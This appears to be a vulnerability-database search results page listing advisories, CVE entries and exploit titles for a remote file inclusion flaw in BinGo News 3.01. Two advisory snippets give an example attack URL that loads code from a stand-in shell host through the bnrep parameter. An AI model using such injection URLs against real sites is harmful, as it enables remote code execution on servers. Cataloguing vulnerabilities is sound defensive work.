15 matches found
EUVD-2006-4637
Malware in sbrugna...
BinGo News <= 3.01 (bnrep) Remote File Include Vulnerability
在文件bpncom.php中,未对包含对象参数bnrep做过滤导致远程文件包含漏洞,代码如下 include $bnrep."bnconfigs.php"; 可导致远程文件包含如下: http://example.com/path/bpncom.php?bnrep=http://SHELLURL.COM...
Bingo News BP_ncom.PHP远程文件包含漏洞
BinGoPHP是一款基于PHP的WEB应用程序。 BinGoPHP不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'BPncom.PHP'脚本对用户提交的'bnrep'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 BinGoPHP BinGoPHP 3.01 http://bingophp.free.fr/ http://www.example.com/Script Path/bpncom.php?bnrep=http://SHELLURL.COM?...
CVE-2006-4648
PHP remote file inclusion vulnerability in bpncom.php in BinGo News BP News 3.01 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the bnrep parameter...
CVE-2006-4649
PHP remote file inclusion vulnerability in bpnews.php in BinGo News BP News 3.01 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the bnrep parameter...
CVE-2006-4648
PHP remote file inclusion vulnerability in bpncom.php in BinGo News BP News 3.01 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the bnrep parameter...
CVE-2006-4649
PHP remote file inclusion vulnerability in bpnews.php in BinGo News BP News 3.01 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the bnrep parameter...
CVE-2006-4648
The CVE-2006-4648 entry describes a PHP remote file inclusion vulnerability in BinGo News (BP News) version 3.01 and earlier, affecting bp_ncom.php. An attacker can cause arbitrary PHP code execution by supplying a URL in the bnrep parameter (remote file inclusion via bnrep). The connected record...
CVE-2006-4649
The CVE-2006-4649 entry affects BinGo News (BP News) software, specifically version 3.01 and earlier. The vulnerability is a PHP remote file inclusion in bp_news.php via the bnrep parameter, allowing an attacker to cause the execution of arbitrary PHP code on the affected system. Connected record...
BinGo.txt
============================================================================================== BinGo News = v3.01 bnrep Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...
BinGo News 3.01 - bnrep Remote File Inclusion
BinGo News 3.01 - bnrep Remote File Inclusion ============================================================================================== BinGo News = v3.01 bnrep Remote File Inclusion Exploit ===============================================================================================...
BinGo News 3.01 - 'bnrep' Remote File Inclusion
============================================================================================== BinGo News = v3.01 bnrep Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...
BinGo News <= 3.01 (bnrep) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ============================================================ BinGo News = 3.01 bnrep Remote File Include Vulnerability ============================================================...
BinGo News <= v3.01 (bnrep) Remote File Inclusion Exploit
============================================================================================== BinGo News = v3.01 bnrep Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...
BinGo News <= 3.01 (bnrep) Remote File Include Vulnerability
No description provided by source. ============================================================================================== BinGo News = v3.01 bnrep Remote File Inclusion Exploit =============================================================================================== Critical Level :...